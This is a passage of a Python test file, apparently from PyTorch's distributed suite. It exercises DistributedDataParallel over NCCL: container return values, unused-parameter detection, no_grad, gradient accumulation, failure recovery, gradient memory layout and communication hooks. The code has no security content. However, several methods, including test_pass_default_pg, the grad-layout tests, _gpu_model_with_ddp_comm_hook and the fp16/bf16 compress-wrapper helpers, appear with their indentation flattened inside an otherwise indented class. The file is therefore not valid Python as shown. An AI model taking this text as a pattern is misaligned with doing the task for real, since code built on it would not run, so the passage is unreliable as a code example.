        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        class ForwardReturnValueModule(nn.Module):
            def __init__(self):
                super(ForwardReturnValueModule, self).__init__()
                self.fc1 = nn.Linear(2, 10, bias=False)
                self.fc2 = nn.Linear(10, 4, bias=False)
                self.fc3 = nn.Linear(4, 4, bias=False)
                self.relu = nn.ReLU()

            def forward(self, x, fn):
                x = self.relu(self.fc1(x))
                x = self.relu(self.fc2(x))
                # The first softmax does NOT include fc3 in its autograd graph
                # whereas the second softmax DOES. If we pass only the first
                # tensor we see in the output to the reducer, it marks the
                # gradient for fc3 as ready (because it doesn't show up). If
                # downstream uses of this return value choose to differentiate
                # against the second output tensor, it would still receive a
                # gradient and a callback for this tensor, resulting in a crash.
                return fn(
                    F.softmax(x, dim=1),
                    F.softmax(self.fc3(x), dim=1),
                )

        device_id = gpus_for_rank(self.world_size)[self.rank][0]
        model = DistributedDataParallel(
            ForwardReturnValueModule().float().to(device_id),
            device_ids=[device_id],
            process_group=process_group,
            gradient_as_bucket_view=gradient_as_bucket_view,
        )

        batch_size = 4
        criterion = nn.CrossEntropyLoss()
        input = torch.rand([batch_size, 2], dtype=torch.float)
        target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
            device_id
        )

        # Always run "backward" to ensure the reducer is called by autograd.
        # If we don't correctly capture the output tensors from the return value,
        # the reducer won't see a hook for the unused parameter, and throw an error.
        # The correct capture is what we're testing in this function.
        def test(box, unbox):
            # box wraps the two outputs into a container; unbox picks the
            # second (fc3-dependent) tensor back out for the loss.
            output = model(input, fn=box)
            loss = criterion(unbox(output), target)
            loss.backward()

        # Test with identity return value
        test(
            box=lambda x, y: (x, y),
            unbox=lambda obj: obj[1],
        )

        # Test with list return value
        test(
            box=lambda x, y: ["foo", x, "bar", y],
            unbox=lambda obj: obj[3],
        )

        # Test with tuple return value
        test(
            box=lambda x, y: ("foo", x, "bar", y),
            unbox=lambda obj: obj[3],
        )

        # Test with dict return value
        test(
            box=lambda x, y: {"foo": "bar", "a": x, "b": y},
            unbox=lambda obj: obj["b"],
        )

        # Test with list with dict return value
        test(
            box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
            unbox=lambda obj: obj[2]["b"],
        )

        # Test with dict with list return value
        test(
            box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
            unbox=lambda obj: obj["list"][3],
        )
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_arbitrary_forward_return_value(self):
        """Arbitrary-container forward outputs with default gradients."""
        self._test_arbitrary_forward_return_value()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_arbitrary_forward_return_value_grad_is_view(self):
        """Arbitrary-container forward outputs with gradient_as_bucket_view."""
        self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_with_lazy_parameters(self):
        """Wrapping a module with uninitialized (lazy) parameters in DDP must
        raise RuntimeError."""
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        with self.assertRaisesRegex(
            RuntimeError, "Modules with uninitialized parameters"
        ):
            DistributedDataParallel(
                torch.nn.LazyLinear(10), process_group=process_group
            )
    def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
        """
        Verify find_unused_parameters behavior: enabling it on a model whose
        "unused" fc3 is in fact used outside forward triggers a
        mark-variable-ready-twice error (with the parameter index, and its
        name under debug modes), while disabling it (explicitly or by
        default) runs cleanly.

        Note: this test can be sped up by only running it on a CPU module
        once DistributedDataParallel supports them.
        """
        torch.cuda.set_device(self.rank)
        dist.init_process_group(
            backend="nccl",
            world_size=self.world_size,
            rank=self.rank,
            init_method=f"file://{self.file_name}",
        )
        process_group = c10d.distributed_c10d._get_default_group()

        class FindUnusedParametersModule(nn.Module):
            def __init__(self):
                super(FindUnusedParametersModule, self).__init__()
                self.fc1 = nn.Linear(2, 10, bias=False)
                self.fc2 = nn.Linear(10, 4, bias=False)
                self.fc3 = nn.Linear(4, 4, bias=False)
                self.relu = nn.ReLU()

            def forward(self, x):
                x = self.relu(self.fc1(x))
                x = self.relu(self.fc2(x))
                # Return the fc3 module so that the caller can invoke it
                # outside of the forward function. While this is bad practice,
                # we can use it to trigger a reducer error.
                return (F.softmax(x, dim=1), self.fc3)

        device_id = gpus_for_rank(self.world_size)[self.rank][0]
        batch_size = 4
        criterion = nn.CrossEntropyLoss()
        input = torch.rand([batch_size, 2], dtype=torch.float)
        target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
            device_id
        )

        # Captured via nonlocal so the error-path assertions below can
        # inspect the wrapped module after the helper runs.
        ddp_model = None

        def test_find_unused_parameters(
            find_unused_parameters, test_default=False, gradient_as_bucket_view=False
        ):
            # test_default=True omits the kwarg entirely to exercise DDP's
            # default value for find_unused_parameters.
            if test_default:
                model = DistributedDataParallel(
                    FindUnusedParametersModule().float().to(device_id),
                    device_ids=[device_id],
                    process_group=process_group,
                    gradient_as_bucket_view=gradient_as_bucket_view,
                )
            else:
                model = DistributedDataParallel(
                    FindUnusedParametersModule().float().to(device_id),
                    device_ids=[device_id],
                    process_group=process_group,
                    find_unused_parameters=find_unused_parameters,
                    gradient_as_bucket_view=gradient_as_bucket_view,
                )
            nonlocal ddp_model
            ddp_model = model

            output, fc3 = model(input)
            # Calling fc3 outside forward makes the "unused" parameter used.
            output = fc3(output)
            loss = criterion(output, target)
            loss.backward()

        # First test that finding unused params under these conditions is to
        # trigger an error when `backward` is called (because fc3 is an unused
        # parameter and will therefore be marked ready twice).
        try:
            test_find_unused_parameters(
                True, gradient_as_bucket_view=gradient_as_bucket_view
            )
        except Exception as ex:
            self.assertTrue(
                str(ex).startswith(
                    "Expected to mark a variable ready only once.",
                )
            )
            unused_index = 2
            unused_index_str = f"Parameter at index {unused_index}"
            model = ddp_model.module
            for module_name, module in model.named_modules():
                if module == model.fc3:
                    for parameter_name, _ in module.named_parameters(recurse=False):
                        unused_fqn = f"{module_name}.{parameter_name}"
                        # Only one such parameter in model.fc3, since bias=False
                        break

            # Debug modes (INFO/DETAIL) additionally include the parameter's
            # fully qualified name in the error message.
            if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
                unused_index_str += f" with name {unused_fqn}"

            self.assertTrue(unused_index_str in str(ex))
        else:
            self.fail("Expected exception")

        dist.barrier(process_group)

        # Then test that the default behavior can be overridden by setting
        # `find_unused_parameters=False`.
        try:
            test_find_unused_parameters(
                False, gradient_as_bucket_view=gradient_as_bucket_view
            )
        except Exception as ex:
            self.fail("Unexpected exception: %s" % ex)

        # Test find_unused_parameters defaults to False
        try:
            test_find_unused_parameters(
                True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
            )
        except Exception as ex:
            self.fail("Unexpected exception: %s" % ex)
    # TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
    # is resolved.
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    @with_dist_debug_levels(levels=["DETAIL"])
    def test_find_unused_parameters_kwarg_debug_detail(self):
        """find_unused_parameters under DETAIL debug level."""
        self._test_find_unused_parameters_kwarg()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    @with_dist_debug_levels(levels=["INFO"])
    def test_find_unused_parameters_kwarg_debug_info(self):
        """find_unused_parameters under INFO debug level."""
        self._test_find_unused_parameters_kwarg()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    @with_dist_debug_levels(levels=["OFF"])
    def test_find_unused_parameters_kwarg_debug_off(self):
        """find_unused_parameters with debug level OFF."""
        self._test_find_unused_parameters_kwarg()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    @with_dist_debug_levels(levels=["DETAIL"])
    def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
        """find_unused_parameters + gradient_as_bucket_view, DETAIL level."""
        self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    @with_dist_debug_levels(levels=["INFO"])
    def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
        """find_unused_parameters + gradient_as_bucket_view, INFO level."""
        self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    @with_dist_debug_levels(levels=["OFF"])
    def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
        """find_unused_parameters + gradient_as_bucket_view, debug OFF."""
        self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
    def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
        """
        Call backward once per output of a two-headed module; neither call
        should crash the reducer.

        Note: this test can be sped up by only running it on a CPU module
        once DistributedDataParallel supports them.
        """
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        class MultipleOutputModule(nn.Module):
            def __init__(self):
                super(MultipleOutputModule, self).__init__()

                def define_module():
                    # Two structurally identical but independent heads.
                    return nn.Sequential(
                        nn.Linear(2, 10, bias=False),
                        nn.ReLU(),
                        nn.Linear(10, 4, bias=False),
                        nn.ReLU(),
                    )

                self.module0 = define_module()
                self.module1 = define_module()

            def forward(self, x):
                return (
                    F.softmax(self.module0(x), dim=1),
                    F.softmax(self.module1(x), dim=1),
                )

        device_id = gpus_for_rank(self.world_size)[self.rank][0]
        model = DistributedDataParallel(
            MultipleOutputModule().float().to(device_id),
            device_ids=[device_id],
            process_group=process_group,
            gradient_as_bucket_view=gradient_as_bucket_view,
        )

        batch_size = 4
        criterion = nn.CrossEntropyLoss()
        input = torch.rand([batch_size, 2], dtype=torch.float)
        target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
            device_id
        )

        # Compute loss and gradients for both outputs
        output1, output2 = model(input)
        loss1 = criterion(output1, target)
        loss1.backward()
        loss2 = criterion(output2, target)
        loss2.backward()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_multiple_outputs_multiple_backward(self):
        """Two-output backward with default gradients."""
        self._test_multiple_outputs_multiple_backward()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_multiple_outputs_multiple_backward_grad_is_view(self):
        """Two-output backward with gradient_as_bucket_view enabled."""
        self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_no_grad(self):
        """
        A forward pass under torch.no_grad() through DDP must not populate
        any parameter gradients.

        Note: this test can be sped up by only running it on a CPU module
        once DistributedDataParallel supports them.
        """
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        class NoGradModule(nn.Module):
            def __init__(self):
                super(NoGradModule, self).__init__()
                self.fc1 = nn.Linear(2, 10, bias=False)
                self.fc2 = nn.Linear(10, 4, bias=False)
                self.relu = nn.ReLU()

            def forward(self, x):
                x = self.relu(self.fc1(x))
                x = self.relu(self.fc2(x))
                return F.softmax(x, dim=1)

        device_id = gpus_for_rank(self.world_size)[self.rank][0]
        model = DistributedDataParallel(
            NoGradModule().float().to(device_id),
            device_ids=[device_id],
            process_group=process_group,
        )

        batch_size = 4
        input = torch.rand([batch_size, 2], dtype=torch.float)

        def check_no_grads():
            # Params must still require grad but have no .grad populated.
            for p in model.parameters():
                self.assertTrue(p.requires_grad)
                self.assertIsNone(p.grad)

        # After initialization, no parameter has their gradient set.
        check_no_grads()

        # Run `forward` function with torch.no_grad()
        with torch.no_grad():
            output = model(input)
            self.assertTrue(isinstance(output, torch.Tensor))

        # No parameter should have their gradient set.
        check_no_grads()
    def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
        """Alternate stepping the bare inner module (no gradient sync) with
        stepping through the DDP wrapper (sync), and check the grads diverge
        and re-converge accordingly."""
        # This is NOT the recommended way to implement accumulating grads, but
        # we would like to make sure DDP does not mess up with the underlying
        # module.
        int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
        devices = [torch.device("cuda:" + str(i)) for i in int_devices]
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        global_batch_size = self.world_size

        model, ddp_model, input, target = self._prepare_single_device_module(
            process_group, devices, devices, global_batch_size, gradient_as_bucket_view
        )

        def step_model(model, input, target):
            # One local fwd/bwd step; no optimizer update.
            model.train()
            output = model(input)
            loss = F.mse_loss(output, target.to(output.device))
            loss.backward()

        # ensure accumulate grads works with no_grad
        with torch.no_grad():
            ddp_model.train()
            ddp_model.module(input)

        # Check two model parameters over 4 iterations.
        # Use 4 iterations because we alternate between reducing and
        # not reducing and want to make sure we switch both ways.
        for iteration in range(4):
            step_model(model, input, target)

            if iteration % 2 == 0:
                # Skip gradients sync without calling prepare_for_backward
                step_model(
                    ddp_model.module,
                    input[self.rank : (self.rank + 1)],
                    target[self.rank : (self.rank + 1)],
                )
                # Without sync, per-rank grads differ from the reference model.
                for i, j in zip(model.parameters(), ddp_model.parameters()):
                    self.assertNotEqual(i.grad, j.grad)
            else:
                step_model(
                    ddp_model,
                    input[self.rank : (self.rank + 1)],
                    target[self.rank : (self.rank + 1)],
                )
                for i, j in zip(model.parameters(), ddp_model.parameters()):
                    # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
                    self.assertEqualIgnoreType(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)

            # Shuffle the input so that DDP input is different
            torch.manual_seed(1337 + iteration)
            input = input[torch.randperm(global_batch_size)]
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_accumulate_gradients_module(self):
        """Gradient accumulation via the bare module, default gradients."""
        self._test_accumulate_gradients_module()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_accumulate_gradients_module_with_grad_is_view(self):
        """Gradient accumulation via the bare module, gradient_as_bucket_view."""
        self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_failure_recovery(self):
        """Tear down a DDP instance, process group, and FileStore, then
        rebuild all three against a fresh store and verify training still
        works with the same underlying module."""
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        # need to create a separate file for the recovered FileStore, because
        # the original one will be deleted when destructing the first FileStore.
        recovery_filename = self.file_name + "_recovery"

        if self.rank == 0:
            # the file will be deleted by the recovered FileStore
            open(recovery_filename, "w").close()

        # not necessary to run barrier here, as DDP will synchronize

        class TestModel(nn.Module):
            def __init__(self):
                super(TestModel, self).__init__()
                self.fc1 = nn.Linear(2, 10, bias=False)
                self.fc2 = nn.Linear(10, 4, bias=False)
                self.relu = nn.ReLU()

            def forward(self, x):
                x = self.relu(self.fc1(x))
                x = self.relu(self.fc2(x))
                return F.softmax(x, dim=1)

        device_id = gpus_for_rank(self.world_size)[self.rank][0]
        model = TestModel().float().to(device_id)
        ddp = DistributedDataParallel(
            model,
            device_ids=[device_id],
            process_group=process_group,
        )

        batch_size = 4
        criterion = nn.CrossEntropyLoss()
        input = torch.rand([batch_size, 2], dtype=torch.float)
        target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
            device_id
        )

        for _ in range(6):
            output = ddp(input)
            loss = criterion(output, target)
            loss.backward()

        # Simulate a failure/restart: drop every handle to the first group.
        del ddp
        del process_group
        del store  # this will delete self.file_name

        # Recover with a brand-new store and group; the module is reused.
        store = c10d.FileStore(recovery_filename, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        ddp = DistributedDataParallel(
            model,
            device_ids=[device_id],
            process_group=process_group,
        )

        input = torch.rand([batch_size, 2], dtype=torch.float)
        target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
            device_id
        )
        for _ in range(6):
            output = ddp(input)
            loss = criterion(output, target)
            loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
    def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
        """Verify DDP gradients keep each layer's memory format and match the
        single-process model's gradients across bucket sizes, formats, dtypes.

        replica_devices: ``device_ids`` passed to DDP (None for a multi-device
            module, which DDP does not replicate).
        layer_devs: a single device, or a per-layer list of devices, for the
            ConvNet layers.
        local_batch_size: per-rank batch size; the global batch is
            ``world_size`` times this, and each rank trains on its own slice.
        """
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        global_batch_size = local_batch_size * self.world_size
        # Carry out some trials with small buckets and some with big buckets.
        bucketsizes = (0.000001, 25)
        # Tuples of lists. Each list describes per-layer characteristics for one trial.
        layer_formats = (
            [torch.contiguous_format] * 4,
            [torch.channels_last] * 2 + [torch.contiguous_format] * 2,
            [torch.channels_last] * 4,
        )
        layer_dtypes = (
            [torch.float] * 4,
            [torch.float] * 2 + [torch.half] * 2,
            [torch.half] * 4,
        )
        # Input lives on the first layer's device, target on the last layer's.
        input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
        target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
        input = torch.randn(
            (global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
        )
        target = torch.randn(
            (global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
        )
        local_batch_start = self.rank * local_batch_size
        local_batch_end = (self.rank + 1) * local_batch_size
        # Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
        # argument. The following makes sure the initial bucket also complies.
        @contextmanager
        def first_bucket_size(ddp_bucket_mb):
            # Temporarily override the reducer's first-bucket byte budget.
            old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
            dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
            try:
                yield
            finally:
                dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
        with torch.backends.cudnn.flags(
            enabled=True, deterministic=True, benchmark=False
        ):
            for formats, dtypes, bucketsize in product(
                layer_formats, layer_dtypes, bucketsizes
            ):
                with first_bucket_size(bucketsize):
                    model_msg = (
                        "rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
                            self.rank, formats, dtypes, bucketsize
                        )
                    )
                    try:
                        m = ConvNet(layer_devs, formats, dtypes)
                        m_ddp = DistributedDataParallel(
                            copy.deepcopy(m),
                            device_ids=replica_devices,
                            process_group=process_group,
                            bucket_cap_mb=bucketsize,
                        )
                        opt = torch.optim.SGD(m.parameters(), lr=0.1)
                        opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
                        # Relax the comparison tolerance when any param is half precision.
                        has_half = any(p.dtype is torch.half for p in m.parameters())
                        tol = 1.0e-3 if has_half else 1.0e-5
                    except BaseException:
                        # Prints case-specific debugging info to narrow down failing case.
                        print(
                            "Caught exception during model creation for " + model_msg,
                            flush=True,
                        )
                        raise
                    # 3 iters: First iter creates grads, second iter retests after rebucketing,
                    # third iter tries zeroed grads.
                    for it in range(3):
                        iter_msg = "iter = {} ".format(it) + model_msg
                        named_msg = iter_msg
                        try:
                            # Single-process model trains on the global batch; DDP
                            # model trains on this rank's slice only.
                            F.mse_loss(m(input).float(), target).backward()
                            F.mse_loss(
                                m_ddp(input[local_batch_start:local_batch_end]).float(),
                                target[local_batch_start:local_batch_end],
                            ).backward()
                            for i, ((layer_name, m_child), m_ddp_child) in enumerate(
                                zip(m.named_children(), m_ddp.module.children())
                            ):
                                named_msg = layer_name + ".weight" + " " + iter_msg
                                self.assertTrue(
                                    m_child.weight.grad.is_contiguous(
                                        memory_format=formats[i]
                                    ),
                                    named_msg,
                                )
                                self.assertTrue(
                                    m_ddp_child.weight.grad.is_contiguous(
                                        memory_format=formats[i]
                                    ),
                                    named_msg,
                                )
                                for j, ((param_name, p), p_ddp) in enumerate(
                                    zip(
                                        m_child.named_parameters(),
                                        m_ddp_child.parameters(),
                                    )
                                ):
                                    named_msg = (
                                        layer_name + "." + param_name + " " + iter_msg
                                    )
                                    self.assertEqual(
                                        p.grad, p_ddp.grad, rtol=tol, atol=tol
                                    )
                            opt.step()
                            opt_ddp.step()
                            if it == 0:
                                for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
                                    p.grad = None
                                    p_ddp.grad = None
                            else:
                                m.zero_grad()
                                m_ddp.zero_grad()
                        except BaseException:
                            # Makes sure we still get info if an error occurred somewhere other than the asserts.
                            print(
                                "Caught exception during iterations at " + named_msg,
                                flush=True,
                            )
                            raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to constructs this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_param_layout_mismatch_error(self):
        """Ranks build the same model with different memory formats; DDP
        construction must raise on the rank whose strides do not match rank 0."""
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
        layer_devs = dev0
        # Rank 0 uses contiguous layout; every other rank uses channels_last.
        layer_formats = (
            [torch.contiguous_format] * 4
            if self.rank == 0
            else [torch.channels_last] * 4
        )
        layer_dtypes = [torch.float] * 4
        m = ConvNet(layer_devs, layer_formats, layer_dtypes)
        if self.rank == 0:
            m_ddp = DistributedDataParallel(
                m, device_ids=[dev0], process_group=process_group
            )
        else:
            with self.assertRaisesRegex(
                RuntimeError,
                ".* appears not to match strides of the same param in process 0",
            ):
                m_ddp = DistributedDataParallel(
                    m, device_ids=[dev0], process_group=process_group
                )
def _gpu_model_with_ddp_comm_hook(
self,
process_group,
hook=None,
gradient_as_bucket_view=False,
state=None,
static_graph=False,
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
if static_graph:
gpu_model._set_static_graph()
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_ddp_comm_hook_future_passing_gpu_nccl(self):
        """
        This unit test verifies whether the Future object is passed properly using nccl backend.
        The hook callback function creates a Future object and sets a value to it.
        """
        store = c10d.FileStore(self.file_name, self.world_size)
        # NCCL-backed group for the DDP model under test.
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        # Get GPU model with simple_hook registered.
        gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
        # check whether the grads are equal to what simple_hook's then callback returns.
        # without the comm_hook, result would be 0.25 * torch.ones(2, 2).
        self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
    def _test_ddp_comm_hook_allreduce_hook_nccl(
        self, gradient_as_bucket_view=False, static_graph=False
    ):
        """
        This unit test verifies whether a DDP communication hook that just calls
        allreduce gives the same result with the case of no hook registered.
        Without the then callback, the future_value in reducer is no longer
        a PyObject, and this unit test verifies future_value is properly checked.
        """
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        def allreduce_hook(
            state: object, bucket: dist.GradBucket
        ) -> torch.futures.Future[torch.Tensor]:
            # Pre-divide by world size so the allreduced sum equals the average.
            tensors = [bucket.buffer() / self.world_size]
            return (
                process_group.allreduce(tensors)
                .get_future()
                .then(lambda fut: fut.value()[0])
            )
        # Get GPU model with allreduce_hook registered.
        gpu_model = self._gpu_model_with_ddp_comm_hook(
            process_group, allreduce_hook, gradient_as_bucket_view, static_graph
        )
        # check whether the grads are equal to what DDP without hook would return.
        self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
    def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
        """
        This unit test verifies whether default Python DDP communication hooks ALLREDUCE, FP16_COMPRESS
        and BF16_COMPRESS, can give the same result with the case of no hook registered.
        """
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        # For these default DDP comm hooks, the only state is process group.
        state = process_group
        hook_options = [default.allreduce_hook, default.fp16_compress_hook]
        # bf16 compression is gated on NCCL >= 2.9.7, CUDA bfloat16 support,
        # and not running under ROCm.
        if (
            not TEST_WITH_ROCM
            and BFLOAT16_AVAILABLE
            and c10d.is_nccl_available()
            and torch.cuda.nccl.version() >= (2, 9, 7)
        ):
            hook_options.append(default.bf16_compress_hook)
        for hook in hook_options:
            # Get GPU model with the hook registered.
            # The first arg 'process_group' is used for initializing the test environment,
            # so it cannot be replaced by 'state', although they have the same value.
            gpu_model = self._gpu_model_with_ddp_comm_hook(
                process_group, hook, gradient_as_bucket_view, state
            )
            # check whether the grads are equal to what DDP without hook would return.
            self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_bf16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the BF16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.bf16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
    def _test_hook_then_optimizer(
        self,
        functional_optim_cls,
        *functional_optim_args,
        gradient_as_bucket_view=False,
        **functional_optim_kwargs
    ):
        """Run DDP with an allreduce-then-optimizer fused comm hook and verify
        the resulting parameters match allreduce hook + a separate optimizer step.

        functional_optim_cls: functional optimizer class fused into the hook.
        functional_optim_args/kwargs: forwarded both to the functional optimizer
            and to its eager counterpart (looked up via functional_optim_map).
        """
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
        hook, hook_state = default.allreduce_hook, process_group
        opt_hook_state = default._OptimizerHookState(
            functional_optim_cls,
            *functional_optim_args,
            **functional_optim_kwargs,
        )
        gpu_model = self._gpu_model_with_ddp_comm_hook(
            process_group,
            default._hook_then_optimizer(hook, opt_hook_state),
            gradient_as_bucket_view,
            hook_state,
        )
        prev_params = copy.deepcopy(list(gpu_model.parameters()))
        # Run model with optimizer as part of hook
        for _ in range(8):
            gpu_model.zero_grad()
            self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
        new_params = list(gpu_model.parameters())
        # Run plain model with allreduce hook and separate optimizer step.
        # Verify gradients are the same.
        gpu_model_allreduce = self._gpu_model_with_ddp_comm_hook(
            process_group, default.allreduce_hook, gradient_as_bucket_view, hook_state
        )
        # Map the functional optimizer class back to its eager counterpart.
        # NOTE(review): ``.get`` returns None for an unmapped class, which would
        # raise TypeError on the call below; consider an explicit lookup error.
        mapping = {v: k for k, v in functional_optim_map.items()}
        # "sgd" is a generic name here: this is whatever eager optimizer
        # corresponds to functional_optim_cls (SGD, Adam, AdamW, ...).
        sgd = mapping.get(functional_optim_cls)(
            gpu_model_allreduce.parameters(),
            *functional_optim_args,
            **functional_optim_kwargs,
        )
        for _ in range(8):
            gpu_model_allreduce.zero_grad()
            self._run_and_verify_hook(gpu_model_allreduce, 8, 0.25 * torch.ones(2, 2))
            sgd.step()
        post_opt_params = list(gpu_model_allreduce.parameters())
        for opt_as_hook_param, post_opt_param in zip(new_params, post_opt_params):
            self.assertEqual(opt_as_hook_param, post_opt_param)
